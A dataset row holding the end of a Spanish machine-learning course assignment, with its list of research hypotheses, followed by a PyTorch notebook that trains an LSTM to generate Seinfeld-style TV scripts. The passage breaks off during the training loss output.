analizar críticamente los resultados sin descartar hipótesis alternativas. \n\n> La metodología debe incluir al menos 3 datasets, de los cuales al menos 2 deben ser reales. Es deseable también que incluyan experimentos controlados sobre dataset sintéticos o semi-sintéticos no triviales diseñados por ustedes. Por ejemplo, para demostrar que un método logra ignorar variables irrelevantes se podrían crear variables \"fake\" manualmente. Experimentos de este último tipo que se basen en un dataset real contarán como realizados sobre \"dataset reales\".\n\n> Si no es relevante para la pregunta de investigación y en honor al tiempo, no es necesario llevar a cabo un análisis exploratorio detallado sobre cada dataset utilizado.\n\n> **2. Desafío Kaggle**. Para esta parte, los autores enfrentarán un desafío en la plataforma Kaggle y serán calificados en base a su posición en el tablero de resultados y el puntaje obtenido.\n\n\n\n", "_____no_output_____" ], [ "<hr style=\"height:2px;border:none\"/>\n", "_____no_output_____" ], [ "# Parte 1. Pregunta de Investigación", "_____no_output_____" ], [ "Reuna evidencia experimental para refutar o sostener una de las siguientes hipótesis u afirmaciones (máximo 2 equipos por hipótesis).\n\nElegir tema acá **usando el nombre del equipo**:\n\nhttps://doodle.com/poll/qgw7h5xb72khqq9x?utm_source=poll&utm_medium=link\n", "_____no_output_____" ], [ "\n\n\n> **1. Clasificadores Discriminativos versus Generativos.** Con muy pocos ejemplos etiquetados, un clasificador generativo alcanza un mejor error de clasificación que un clasificador discriminativo. Sin embargo, a medida que aumenta el número de ejemplos, la situación se invierte.\n\n> **2. Perceptrón y Margen.** La cota teórica que relaciona el número de iteraciones del perceptrón con el margen no se verifica experimentalmente, sobre pasándose en la mayoría de los casos.\n\n> **3. Margen y Overfitting.** El error de predicción de un clasificador lineal no es directamente proporcional al margen obtenido, pero el grado de overfitting sí lo es.\n\n> **4. Regresión Logística Multi-class.**: En problemas multi-class, usar un regresor logístico con heurísticas como OVO permite obtener un mejor desempeño que la extensión nativa.\n\n> **5. Label Noise.**: Un clasificador de tipo generativo es extremadamente sensible a errores de etiquetación, es decir aún si un porcentaje pequeño (< 10%) de las etiquetas de entrenamiento está corrupta, su desempeño se deteriora significativamente (> 10% de acccuracy). \n\n> **6. Crowdsourcing.**: Al entrenar un clasificador logístico con múltiples anotaciones por dato (provistas por diferentes anotadores), el clasificador aprende a predecir la etiqueta mayoritaria.\n\n> **7. Regresión Logística con Pesos:** Modificar los pesos de cada clase en la función objetivo del clasificador logístico permite mejorar los resultados en problemas de clasificación desbalanceados. \n\n> **8. Texto & NLP.** En problemas de clasificación de texto, un modelo Bayesiano Ingenuo puede superar el desempeño de un clasificador discriminativo entrenado sobre una representación neuronal simple tipo AWE.\n\n> **9. Texto & NLP.** Al entrenar un clasificador logístico para texto, el uso de mecanismos para \"pesar\" los términos, como TF-IDF, no genera mejoras significativas ya que el clasificador \"aprende\" directamente estos pesos durante el entrenamiento. \n\n> **10. Entre LDA y QDA.** Un \"híbrido\" LDA/QDA supera tanto a QDA como a LDA.\n\n> Definición del Híbrido: denotemos por $\\hat{\\Sigma}_k$ las matrices de covarianza obtenidas por QDA y por $\\hat{\\Sigma}$ la (única) matriz de covarianza obtenida por LDA. El híbrido se define como un clasificador gausiano que usa $\\hat{\\Sigma}_{k} = (1-\\lambda) \\hat{\\Sigma}_k + \\lambda \\hat{\\Sigma}$ como matriz de covarianza para cada clase ($\\lambda$ debe ser seleccionado para cada problema).\n\n> **11. Instance Weighting**: Si se re-entrena un clasificador asignando mayor \"peso\" a los ejemplos que éste clasificó mal en un primer entrenamiento, observaremos una mejora en su desempeño final sobre el conjunto de pruebas. \n\n> **12. Instance Weighting**: Si se re-entrena un clasificador asignando mayor \"peso\" a los ejemplos de entrenamiento más parecidos a los ejemplos de prueba (sólo x), observaremos una mejora en su desempeño final sobre ese último conjunto. \n\n> **13. Clases Desbalanceadas**: Un desbalance en la cantidad de ejemplos por clase afecta mucho más el desempeño de un clasificador discriminativo que el desempeño de un clasificador generativo, ya que en este último caso es posible ajustar manualmente los *a-priori* para corregir la situación.\n\n> **14. Datos Faltantes**: La imputación de atributos faltantes mediante criterios sencillos como la moda o la media deteriora significativamente el desempeño de un clasificador generativo, no así de un clasificador discriminativo. \n\n> **15. Métricas de Evaluación:** El área bajo la curva ROC es proporcional al área bajo la curva PR y por lo tanto un clasificador que supera a otro en términos de AUROC lo hace también en términos de AUPR.\n\n> **16. Métricas de Evaluación:** En problemas de clasificación con clases muy desbalanceadas, las métricas denominadas *Micro-average F-Score* y *AUPR* producen un ranking similar sobre un conjunto de clasificadores. \n\n> **17. Selección de Modelos:** Estimar el error de predicción de un clasificador usando un subconjunto de validación reservado desde dataset original produce resultados muy variables dependiendo del porcentaje seleccionado. Desafortundamente, lo mismo sucede con *K-fold crossvalidation* al considerar diferentes valores de K.\n\n> **18. Selección de Modelos:** El número de variables con que se entrena un modelo es inversamente proporcional al error de pruebas y directamente proporcional a la diferencia entre el error de validación y el error de entrenamiento. \n\n> **19. Selección de Modelos:** Seleccionar el valor de dos hiper-parámetros usando dos validaciones cruzadas independientes es tan efectivo como un utilizar un esquema anidado (nested CV).\n\n", "_____no_output_____" ], [ "# Parte 2. Desafío\n\n> TO BE ANNOUNCED.\n\n\n", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb20337f5ea340bbca4017c4d0a3ac7ac2ae02b9
51,815
ipynb
Jupyter Notebook
project-tv-script-generation/dlnd_tv_script_generation.ipynb
typekev/deep-learning-v2-pytorch
c2d8075137e0a4e8b0dde46d2c7eb2a559a3b8c7
[ "MIT" ]
2
2020-12-28T22:21:15.000Z
2020-12-29T05:17:51.000Z
project-tv-script-generation/dlnd_tv_script_generation.ipynb
typekev/deep-learning-v2-pytorch
c2d8075137e0a4e8b0dde46d2c7eb2a559a3b8c7
[ "MIT" ]
null
null
null
project-tv-script-generation/dlnd_tv_script_generation.ipynb
typekev/deep-learning-v2-pytorch
c2d8075137e0a4e8b0dde46d2c7eb2a559a3b8c7
[ "MIT" ]
null
null
null
37.411552
995
0.55428
[ [ [ "# TV Script Generation\n\nIn this project, you'll generate your own [Seinfeld](https://en.wikipedia.org/wiki/Seinfeld) TV scripts using RNNs. You'll be using part of the [Seinfeld dataset](https://www.kaggle.com/thec03u5/seinfeld-chronicles#scripts.csv) of scripts from 9 seasons. The Neural Network you'll build will generate a new ,\"fake\" TV script, based on patterns it recognizes in this training data.\n\n## Get the Data\n\nThe data is already provided for you in `./data/Seinfeld_Scripts.txt` and you're encouraged to open that file and look at the text. \n>* As a first step, we'll load in this data and look at some samples. \n* Then, you'll be tasked with defining and training an RNN to generate a new script!", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\n# load in data\nimport helper\ndata_dir = './data/Seinfeld_Scripts.txt'\ntext = helper.load_data(data_dir)", "_____no_output_____" ] ], [ [ "## Explore the Data\nPlay around with `view_line_range` to view different parts of the data. This will give you a sense of the data you'll be working with. You can see, for example, that it is all lowercase text, and each new line of dialogue is separated by a newline character `\\n`.", "_____no_output_____" ] ], [ [ "view_line_range = (0, 10)\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\nimport numpy as np\n\nprint('Dataset Stats')\nprint('Roughly the number of unique words: {}'.format(len({word: None for word in text.split()})))\n\nlines = text.split('\\n')\nprint('Number of lines: {}'.format(len(lines)))\nword_count_line = [len(line.split()) for line in lines]\nprint('Average number of words in each line: {}'.format(np.average(word_count_line)))\n\nprint()\nprint('The lines {} to {}:'.format(*view_line_range))\nprint('\\n'.join(text.split('\\n')[view_line_range[0]:view_line_range[1]]))", "Dataset Stats\nRoughly the number of unique words: 46367\nNumber of lines: 109233\nAverage number of words in each line: 5.544240293684143\n\nThe lines 0 to 10:\njerry: do you know what this is all about? do you know, why were here? to be out, this is out...and out is one of the single most enjoyable experiences of life. people...did you ever hear people talking about we should go out? this is what theyre talking about...this whole thing, were all out now, no one is home. not one person here is home, were all out! there are people trying to find us, they dont know where we are. (on an imaginary phone) did you ring?, i cant find him. where did he go? he didnt tell me where he was going. he must have gone out. you wanna go out you get ready, you pick out the clothes, right? you take the shower, you get all ready, get the cash, get your friends, the car, the spot, the reservation...then youre standing around, what do you do? you go we gotta be getting back. once youre out, you wanna get back! you wanna go to sleep, you wanna get up, you wanna go out again tomorrow, right? where ever you are in life, its my feeling, youve gotta go. \n\njerry: (pointing at georges shirt) see, to me, that button is in the worst possible spot. the second button literally makes or breaks the shirt, look at it. its too high! its in no-mans-land. you look like you live with your mother. \n\ngeorge: are you through? \n\njerry: you do of course try on, when you buy? \n\ngeorge: yes, it was purple, i liked it, i dont actually recall considering the buttons. \n\n" ] ], [ [ "---\n## Implement Pre-processing Functions\nThe first thing to do to any dataset is pre-processing. Implement the following pre-processing functions below:\n- Lookup Table\n- Tokenize Punctuation\n\n### Lookup Table\nTo create a word embedding, you first need to transform the words to ids. In this function, create two dictionaries:\n- Dictionary to go from the words to an id, we'll call `vocab_to_int`\n- Dictionary to go from the id to word, we'll call `int_to_vocab`\n\nReturn these dictionaries in the following **tuple** `(vocab_to_int, int_to_vocab)`", "_____no_output_____" ] ], [ [ "import problem_unittests as tests\nfrom collections import Counter\n\ndef create_lookup_tables(text):\n \"\"\"\n Create lookup tables for vocabulary\n :param text: The text of tv scripts split into words\n :return: A tuple of dicts (vocab_to_int, int_to_vocab)\n \"\"\"\n # TODO: Implement Function\n word_counter = Counter(text)\n \n sorted_vocab_list = sorted(word_counter, key=word_counter.get, reverse=True)\n \n vocab_to_int = {word: i for i, word in enumerate(sorted_vocab_list)} #Do not need to start from index 1 because no padding.\n int_to_vocab = {i: word for word, i in vocab_to_int.items()}\n \n # return tuple\n return (vocab_to_int, int_to_vocab)\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_create_lookup_tables(create_lookup_tables)", "Tests Passed\n" ] ], [ [ "### Tokenize Punctuation\nWe'll be splitting the script into a word array using spaces as delimiters. However, punctuations like periods and exclamation marks can create multiple ids for the same word. For example, \"bye\" and \"bye!\" would generate two different word ids.\n\nImplement the function `token_lookup` to return a dict that will be used to tokenize symbols like \"!\" into \"||Exclamation_Mark||\". Create a dictionary for the following symbols where the symbol is the key and value is the token:\n- Period ( **.** )\n- Comma ( **,** )\n- Quotation Mark ( **\"** )\n- Semicolon ( **;** )\n- Exclamation mark ( **!** )\n- Question mark ( **?** )\n- Left Parentheses ( **(** )\n- Right Parentheses ( **)** )\n- Dash ( **-** )\n- Return ( **\\n** )\n\nThis dictionary will be used to tokenize the symbols and add the delimiter (space) around it. This separates each symbols as its own word, making it easier for the neural network to predict the next word. Make sure you don't use a value that could be confused as a word; for example, instead of using the value \"dash\", try using something like \"||dash||\".", "_____no_output_____" ] ], [ [ "def token_lookup():\n \"\"\"\n Generate a dict to turn punctuation into a token.\n :return: Tokenized dictionary where the key is the punctuation and the value is the token\n \"\"\"\n # TODO: Implement Function\n \n token_dict = {\n '.': \"||dot||\",\n ',': \"||comma||\",\n '\"': \"||doublequote||\",\n ';': \"||semicolon||\",\n '!': \"||bang||\",\n '?': \"||questionmark||\",\n '(': \"||leftparens||\",\n ')': \"||rightparens||\",\n '-': \"||dash||\",\n '\\n': \"||return||\",\n }\n \n \n \n return token_dict\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_tokenize(token_lookup)", "Tests Passed\n" ] ], [ [ "## Pre-process all the data and save it\n\nRunning the code cell below will pre-process all the data and save it to file. You're encouraged to lok at the code for `preprocess_and_save_data` in the `helpers.py` file to see what it's doing in detail, but you do not need to change this code.", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\n# pre-process training data\nhelper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)", "_____no_output_____" ] ], [ [ "# Check Point\nThis is your first checkpoint. If you ever decide to come back to this notebook or have to restart the notebook, you can start from here. The preprocessed data has been saved to disk.", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport helper\nimport problem_unittests as tests\n\nint_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()", "_____no_output_____" ] ], [ [ "## Build the Neural Network\nIn this section, you'll build the components necessary to build an RNN by implementing the RNN Module and forward and backpropagation functions.\n\n### Check Access to GPU", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport torch\n\n# Check for a GPU\ntrain_on_gpu = torch.cuda.is_available()\nif not train_on_gpu:\n print('No GPU found. Please use a GPU to train your neural network.')", "_____no_output_____" ] ], [ [ "## Input\nLet's start with the preprocessed input data. We'll use [TensorDataset](http://pytorch.org/docs/master/data.html#torch.utils.data.TensorDataset) to provide a known format to our dataset; in combination with [DataLoader](http://pytorch.org/docs/master/data.html#torch.utils.data.DataLoader), it will handle batching, shuffling, and other dataset iteration functions.\n\nYou can create data with TensorDataset by passing in feature and target tensors. Then create a DataLoader as usual.\n```\ndata = TensorDataset(feature_tensors, target_tensors)\ndata_loader = torch.utils.data.DataLoader(data, \n batch_size=batch_size)\n```\n\n### Batching\nImplement the `batch_data` function to batch `words` data into chunks of size `batch_size` using the `TensorDataset` and `DataLoader` classes.\n\n>You can batch words using the DataLoader, but it will be up to you to create `feature_tensors` and `target_tensors` of the correct size and content for a given `sequence_length`.\n\nFor example, say we have these as input:\n```\nwords = [1, 2, 3, 4, 5, 6, 7]\nsequence_length = 4\n```\n\nYour first `feature_tensor` should contain the values:\n```\n[1, 2, 3, 4]\n```\nAnd the corresponding `target_tensor` should just be the next \"word\"/tokenized word value:\n```\n5\n```\nThis should continue with the second `feature_tensor`, `target_tensor` being:\n```\n[2, 3, 4, 5] # features\n6 # target\n```", "_____no_output_____" ] ], [ [ "from torch.utils.data import TensorDataset, DataLoader\n\n\ndef batch_data(words, sequence_length, batch_size):\n \"\"\"\n Batch the neural network data using DataLoader\n :param words: The word ids of the TV scripts\n :param sequence_length: The sequence length of each batch\n :param batch_size: The size of each batch; the number of sequences in a batch\n :return: DataLoader with batched data\n \"\"\"\n # TODO: Implement function\n \n features = []\n targets = []\n \n print(words, sequence_length, batch_size)\n for start in range(len(words) - sequence_length):\n end = start + sequence_length\n \n features.append(words[start:end])\n targets.append(words[end])\n\n data = TensorDataset(torch.tensor(features), torch.tensor(targets))\n data_loader = DataLoader(data, batch_size, True)\n\n # return a dataloader\n return data_loader\n\n# there is no test for this function, but you are encouraged to create\n# print statements and tests of your own\n", "_____no_output_____" ] ], [ [ "### Test your dataloader \n\nYou'll have to modify this code to test a batching function, but it should look fairly similar.\n\nBelow, we're generating some test text data and defining a dataloader using the function you defined, above. Then, we are getting some sample batch of inputs `sample_x` and targets `sample_y` from our dataloader.\n\nYour code should return something like the following (likely in a different order, if you shuffled your data):\n\n```\ntorch.Size([10, 5])\ntensor([[ 28, 29, 30, 31, 32],\n [ 21, 22, 23, 24, 25],\n [ 17, 18, 19, 20, 21],\n [ 34, 35, 36, 37, 38],\n [ 11, 12, 13, 14, 15],\n [ 23, 24, 25, 26, 27],\n [ 6, 7, 8, 9, 10],\n [ 38, 39, 40, 41, 42],\n [ 25, 26, 27, 28, 29],\n [ 7, 8, 9, 10, 11]])\n\ntorch.Size([10])\ntensor([ 33, 26, 22, 39, 16, 28, 11, 43, 30, 12])\n```\n\n### Sizes\nYour sample_x should be of size `(batch_size, sequence_length)` or (10, 5) in this case and sample_y should just have one dimension: batch_size (10). \n\n### Values\n\nYou should also notice that the targets, sample_y, are the *next* value in the ordered test_text data. So, for an input sequence `[ 28, 29, 30, 31, 32]` that ends with the value `32`, the corresponding output should be `33`.", "_____no_output_____" ] ], [ [ "# test dataloader\n\ntest_text = range(50)\nt_loader = batch_data(test_text, sequence_length=5, batch_size=10)\n\ndata_iter = iter(t_loader)\nsample_x, sample_y = data_iter.next()\n\nprint(sample_x.shape)\nprint(sample_x)\nprint()\nprint(sample_y.shape)\nprint(sample_y)", "range(0, 50) 5 10\ntorch.Size([10, 5])\ntensor([[ 18, 19, 20, 21, 22],\n [ 42, 43, 44, 45, 46],\n [ 41, 42, 43, 44, 45],\n [ 1, 2, 3, 4, 5],\n [ 15, 16, 17, 18, 19],\n [ 32, 33, 34, 35, 36],\n [ 26, 27, 28, 29, 30],\n [ 30, 31, 32, 33, 34],\n [ 39, 40, 41, 42, 43],\n [ 4, 5, 6, 7, 8]])\n\ntorch.Size([10])\ntensor([ 23, 47, 46, 6, 20, 37, 31, 35, 44, 9])\n" ] ], [ [ "---\n## Build the Neural Network\nImplement an RNN using PyTorch's [Module class](http://pytorch.org/docs/master/nn.html#torch.nn.Module). You may choose to use a GRU or an LSTM. To complete the RNN, you'll have to implement the following functions for the class:\n - `__init__` - The initialize function. \n - `init_hidden` - The initialization function for an LSTM/GRU hidden state\n - `forward` - Forward propagation function.\n \nThe initialize function should create the layers of the neural network and save them to the class. The forward propagation function will use these layers to run forward propagation and generate an output and a hidden state.\n\n**The output of this model should be the *last* batch of word scores** after a complete sequence has been processed. That is, for each input sequence of words, we only want to output the word scores for a single, most likely, next word.\n\n### Hints\n\n1. Make sure to stack the outputs of the lstm to pass to your fully-connected layer, you can do this with `lstm_output = lstm_output.contiguous().view(-1, self.hidden_dim)`\n2. You can get the last batch of word scores by shaping the output of the final, fully-connected layer like so:\n\n```\n# reshape into (batch_size, seq_length, output_size)\noutput = output.view(batch_size, -1, self.output_size)\n# get last batch\nout = output[:, -1]\n```", "_____no_output_____" ] ], [ [ "import torch.nn as nn\n\nclass RNN(nn.Module):\n \n def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):\n \"\"\"\n Initialize the PyTorch RNN Module\n :param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)\n :param output_size: The number of output dimensions of the neural network\n :param embedding_dim: The size of embeddings, should you choose to use them \n :param hidden_dim: The size of the hidden layer outputs\n :param dropout: dropout to add in between LSTM/GRU layers\n \"\"\"\n super(RNN, self).__init__()\n # TODO: Implement function\n\n # set class variables\n self.output_size = output_size\n self.n_layers = n_layers\n self.hidden_dim = hidden_dim\n # define model layers\n self.embed = nn.Embedding(vocab_size, embedding_dim)\n self.rnn = nn.LSTM(embedding_dim, self.hidden_dim, self.n_layers, dropout=dropout, batch_first=True)\n self.fc = nn.Linear(self.hidden_dim, self.output_size)\n \n def forward(self, nn_input, hidden):\n \"\"\"\n Forward propagation of the neural network\n :param nn_input: The input to the neural network\n :param hidden: The hidden state \n :return: Two Tensors, the output of the neural network and the latest hidden state\n \"\"\"\n # TODO: Implement function\n x = self.embed(nn_input)\n x, hidden = self.rnn(x, hidden)\n x = x.contiguous().view(-1, self.hidden_dim)\n x = self.fc(x)\n x = x.view(nn_input.size(0), -1, self.output_size)[:, -1]\n # return one batch of output word scores and the hidden state\n return x, hidden\n \n \n def init_hidden(self, batch_size):\n '''\n Initialize the hidden state of an LSTM/GRU\n :param batch_size: The batch_size of the hidden state\n :return: hidden state of dims (n_layers, batch_size, hidden_dim)\n '''\n # Implement function\n \n # initialize hidden state with zero weights, and move to GPU if available\n weight = next(self.parameters()).data\n\n hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),\n weight.new(self.n_layers, batch_size, self.hidden_dim).zero_())\n\n if train_on_gpu:\n hidden = (hidden[0].cuda(), hidden[1].cuda())\n\n return hidden\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_rnn(RNN, train_on_gpu)", "Tests Passed\n" ] ], [ [ "### Define forward and backpropagation\n\nUse the RNN class you implemented to apply forward and back propagation. This function will be called, iteratively, in the training loop as follows:\n```\nloss = forward_back_prop(decoder, decoder_optimizer, criterion, inp, target)\n```\n\nAnd it should return the average loss over a batch and the hidden state returned by a call to `RNN(inp, hidden)`. Recall that you can get this loss by computing it, as usual, and calling `loss.item()`.\n\n**If a GPU is available, you should move your data to that GPU device, here.**", "_____no_output_____" ] ], [ [ "def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):\n \"\"\"\n Forward and backward propagation on the neural network\n :param decoder: The PyTorch Module that holds the neural network\n :param decoder_optimizer: The PyTorch optimizer for the neural network\n :param criterion: The PyTorch loss function\n :param inp: A batch of input to the neural network\n :param target: The target output for the batch of input\n :return: The loss and the latest hidden state Tensor\n \"\"\"\n \n # TODO: Implement Function\n\n # move data to GPU, if available\n if train_on_gpu:\n inp, target = inp.cuda(), target.cuda()\n\n # perform backpropagation and optimization\n hidden = tuple([each.data for each in hidden])\n\n optimizer.zero_grad()\n rnn.zero_grad()\n \n output, hidden = rnn(inp, hidden)\n \n loss = criterion(output, target)\n loss.backward()\n\n nn.utils.clip_grad_norm_(rnn.parameters(), 5)\n optimizer.step()\n\n # return the loss over a batch and the hidden state produced by our model\n return loss.item(), hidden\n\n# Note that these tests aren't completely extensive.\n# they are here to act as general checks on the expected outputs of your functions\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_forward_back_prop(RNN, forward_back_prop, train_on_gpu)", "Tests Passed\n" ] ], [ [ "## Neural Network Training\n\nWith the structure of the network complete and data ready to be fed in the neural network, it's time to train it.\n\n### Train Loop\n\nThe training loop is implemented for you in the `train_decoder` function. This function will train the network over all the batches for the number of epochs given. The model progress will be shown every number of batches. This number is set with the `show_every_n_batches` parameter. You'll set this parameter along with other parameters in the next section.", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\n\ndef train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):\n batch_losses = []\n \n rnn.train()\n\n print(\"Training for %d epoch(s)...\" % n_epochs)\n for epoch_i in range(1, n_epochs + 1):\n \n # initialize hidden state\n hidden = rnn.init_hidden(batch_size)\n \n for batch_i, (inputs, labels) in enumerate(train_loader, 1):\n \n # make sure you iterate over completely full batches, only\n n_batches = len(train_loader.dataset)//batch_size\n if(batch_i > n_batches):\n break\n \n # forward, back prop\n loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden) \n # record loss\n batch_losses.append(loss)\n\n # printing loss stats\n if batch_i % show_every_n_batches == 0:\n print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format(\n epoch_i, n_epochs, np.average(batch_losses)))\n batch_losses = []\n\n # returns a trained rnn\n return rnn", "_____no_output_____" ] ], [ [ "### Hyperparameters\n\nSet and train the neural network with the following parameters:\n- Set `sequence_length` to the length of a sequence.\n- Set `batch_size` to the batch size.\n- Set `num_epochs` to the number of epochs to train for.\n- Set `learning_rate` to the learning rate for an Adam optimizer.\n- Set `vocab_size` to the number of uniqe tokens in our vocabulary.\n- Set `output_size` to the desired size of the output.\n- Set `embedding_dim` to the embedding dimension; smaller than the vocab_size.\n- Set `hidden_dim` to the hidden dimension of your RNN.\n- Set `n_layers` to the number of layers/cells in your RNN.\n- Set `show_every_n_batches` to the number of batches at which the neural network should print progress.\n\nIf the network isn't getting the desired results, tweak these parameters and/or the layers in the `RNN` class.", "_____no_output_____" ] ], [ [ "# Data params\n# Sequence Length\nsequence_length = 8 # of words in a sequence\n# Batch Size\nbatch_size = 128\n\n# data loader - do not change\ntrain_loader = batch_data(int_text, sequence_length, batch_size)", "IOPub data rate exceeded.\nThe notebook server will temporarily stop sending output\nto the client in order to avoid crashing it.\nTo change this limit, set the config variable\n`--NotebookApp.iopub_data_rate_limit`.\n\nCurrent values:\nNotebookApp.iopub_data_rate_limit=1000000.0 (bytes/sec)\nNotebookApp.rate_limit_window=3.0 (secs)\n\n" ], [ "# Training parameters\n# Number of Epochs\nnum_epochs = 9\n# Learning Rate\nlearning_rate = 0.001\n\n# Model parameters\n# Vocab size\nvocab_size = len(vocab_to_int)\n# Output size\noutput_size = vocab_size\n# Embedding Dimension\nembedding_dim = 256\n# Hidden Dimension\nhidden_dim = 512\n# Number of RNN Layers\nn_layers = 3\n\n# Show stats for every n number of batches\nshow_every_n_batches = 500", "_____no_output_____" ] ], [ [ "### Train\nIn the next cell, you'll train the neural network on the pre-processed data. If you have a hard time getting a good loss, you may consider changing your hyperparameters. In general, you may get better results with larger hidden and n_layer dimensions, but larger models take a longer time to train. \n> **You should aim for a loss less than 3.5.** \n\nYou should also experiment with different sequence lengths, which determine the size of the long range dependencies that a model can learn.", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\n\n# create model and move to gpu if available\nrnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)\nif train_on_gpu:\n rnn.cuda()\n\n# defining loss and optimization functions for training\noptimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)\ncriterion = nn.CrossEntropyLoss()\n\n# training the model\ntrained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)\n\n# saving the trained model\nhelper.save_model('./save/trained_rnn', trained_rnn)\nprint('Model Trained and Saved')", "Training for 9 epoch(s)...\nEpoch: 1/9 Loss: 5.9196070919036865\n\nEpoch: 1/9 Loss: 5.154569608688354\n\nEpoch: 1/9 Loss: 4.861867110252381\n\nEpoch: 1/9 Loss: 4.663630374908447\n\nEpoch: 1/9 Loss: 4.568453297615052\n\nEpoch: 1/9 Loss: 4.501800373077392\n\nEpoch: 1/9 Loss: 4.4400984477996825\n\nEpoch: 1/9 Loss: 4.407389422893524\n\nEpoch: 1/9 Loss: 4.359781648635864\n\nEpoch: 1/9 Loss: 4.311809137821197\n\nEpoch: 1/9 Loss: 4.285976921081543\n\nEpoch: 1/9 Loss: 4.265631782531738\n\nEpoch: 1/9 Loss: 4.228047152042389\n\nEpoch: 2/9 Loss: 4.1530766147578095\n\nEpoch: 2/9 Loss: 4.056858470439911\n\nEpoch: 2/9 Loss: 4.049036991596222\n\nEpoch: 2/9 Loss: 4.028184664726258\n\nEpoch: 2/9 Loss: 4.027896447658539\n\nEpoch: 2/9 Loss: 3.99689031124115\n\nEpoch: 2/9 Loss: 3.996437876701355\n\nEpoch: 2/9 Loss: 3.978628529548645\n\nEpoch: 2/9 Loss: 4.00464665555954\n\nEpoch: 2/9 Loss: 3.986073437690735\n\nEpoch: 2/9 Loss: 3.9736593861579896\n\nEpoch: 2/9 Loss: 3.9845535202026365\n\nEpoch: 2/9 Loss: 3.9533566370010376\n\nEpoch: 3/9 Loss: 3.887317371565245\n\nEpoch: 3/9 Loss: 3.7951194486618043\n\nEpoch: 3/9 Loss: 3.7917876377105713\n\nEpoch: 3/9 Loss: 3.7811633620262146\n\nEpoch: 3/9 Loss: 3.7886141839027405\n\nEpoch: 3/9 Loss: 3.8130338320732116\n\nEpoch: 3/9 Loss: 3.8106535000801087\n\nEpoch: 3/9 Loss: 3.8175085015296935\n\nEpoch: 3/9 Loss: 3.784125514984131\n\nEpoch: 3/9 Loss: 3.797453468799591\n\nEpoch: 3/9 Loss: 3.80401885843277\n\nEpoch: 3/9 Loss: 3.808668386936188\n\nEpoch: 3/9 Loss: 3.8207490234375\n\nEpoch: 4/9 Loss: 3.7332648527265455\n\nEpoch: 4/9 Loss: 3.634948308467865\n\nEpoch: 4/9 Loss: 3.647617848396301\n\nEpoch: 4/9 Loss: 3.6423205795288087\n\nEpoch: 4/9 Loss: 3.64229798412323\n\nEpoch: 4/9 Loss: 3.647725365638733\n\nEpoch: 4/9 Loss: 3.6609289746284484\n\nEpoch: 4/9 Loss: 3.6745360856056215\n\nEpoch: 4/9 Loss: 3.6791053624153136\n\nEpoch: 4/9 Loss: 3.6619578566551207\n\nEpoch: 4/9 Loss: 3.6766717824935915\n\nEpoch: 4/9 Loss: 3.678693187713623\n\nEpoch: 4/9 Loss: 3.694414616584778\n\nEpoch: 5/9 Loss: 3.5895329953716266\n\nEpoch: 5/9 Loss: 3.5111766138076783\n\nEpoch: 5/9 Loss: 3.5191890153884886\n\nEpoch: 5/9 Loss: 3.5270044150352478\n\nEpoch: 5/9 Loss: 3.5389353365898133\n\nEpoch: 5/9 Loss: 3.546943061828613\n\nEpoch: 5/9 Loss: 3.5659065365791323\n\nEpoch: 5/9 Loss: 3.5496874227523803\n\nEpoch: 5/9 Loss: 3.5708318347930907\n\nEpoch: 5/9 Loss: 3.5583040256500245\n\nEpoch: 5/9 Loss: 3.572103688716888\n\nEpoch: 5/9 Loss: 3.583995021343231\n\nEpoch: 5/9 Loss: 3.5945741410255434\n\nEpoch: 6/9 Loss: 3.508891934580847\n\nEpoch: 6/9 Loss: 3.4223804202079773\n\nEpoch: 6/9 Loss: 3.4277972531318666\n\nEpoch: 6/9 Loss: 3.4104116830825806\n\nEpoch: 6/9 Loss: 3.455143273830414\n\nEpoch: 6/9 Loss: 3.4551423745155336\n\nEpoch: 6/9 Loss: 3.446984980583191\n\nEpoch: 6/9 Loss: 3.4660440020561216\n\nEpoch: 6/9 Loss: 3.490551306247711\n\nEpoch: 6/9 Loss: 3.4813959879875185\n\nEpoch: 6/9 Loss: 3.5088824620246886\n\nEpoch: 6/9 Loss: 3.50870436668396\n\nEpoch: 6/9 Loss: 3.512404335975647\n\nEpoch: 7/9 Loss: 3.42333300760779\n\nEpoch: 7/9 Loss: 3.3405881376266477\n\nEpoch: 7/9 Loss: 3.349756766796112\n\nEpoch: 7/9 Loss: 3.3535381975173952\n\nEpoch: 7/9 Loss: 3.3849702200889586\n\nEpoch: 7/9 Loss: 